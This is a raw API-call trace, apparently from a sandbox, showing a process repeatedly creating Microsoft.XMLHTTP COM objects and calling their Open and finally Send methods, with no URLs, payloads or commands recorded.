	[0251.689] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0251.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0251.689] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0251.689] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0251.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0251.689] ??2@YAPEAX_K@Z () returned 0x62f310
	[0251.689] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
	[0251.689] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0251.690] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0251.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0251.690] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0251.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.690] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0251.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0251.693] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0251.693] SysStringLen (param_1=0x0) returned 0x0
	[0251.693] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0251.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0251.693] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72d0) returned 0x0
	[0251.693] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0251.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0251.693] ??2@YAPEAX_K@Z () returned 0x62f330
	[0251.693] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0251.693] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0251.693] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0251.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72d0) returned 0x0
	[0251.693] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72d0) returned 0x3
	[0251.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.693] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0251.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0251.694] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0251.694] SysStringLen (param_1=0x0) returned 0x0
	[0251.694] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0251.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0251.694] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0251.694] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0251.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0251.694] ??2@YAPEAX_K@Z () returned 0x62f310
	[0251.694] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0251.694] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0251.694] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0251.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0251.694] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0251.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.694] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0251.694] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0251.694] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0251.694] SysStringLen (param_1=0x0) returned 0x0
	[0251.694] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0251.695] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0251.695] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0251.695] ??2@YAPEAX_K@Z () returned 0x62f330
	[0251.695] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0251.695] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0251.695] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.695] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0251.695] longjmp () 
	[0251.695] longjmp () 
	[0251.695] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0251.695] SysStringLen (param_1=0x0) returned 0x0
	[0251.695] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0251.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0251.695] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72d0) returned 0x0
	[0251.696] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0251.696] ??2@YAPEAX_K@Z () returned 0x62f310
	[0251.696] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0251.696] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72d0) returned 0x0
	[0251.696] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72d0) returned 0x3
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.696] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0251.696] longjmp () 
	[0251.696] longjmp () 
	[0251.696] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0251.696] SysStringLen (param_1=0x0) returned 0x0
	[0251.696] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0251.696] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0251.696] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0251.696] ??2@YAPEAX_K@Z () returned 0x62f330
	[0251.696] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0251.696] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0251.696] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0251.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0251.697] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0251.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.697] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0251.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0251.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0251.697] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0251.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0253.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
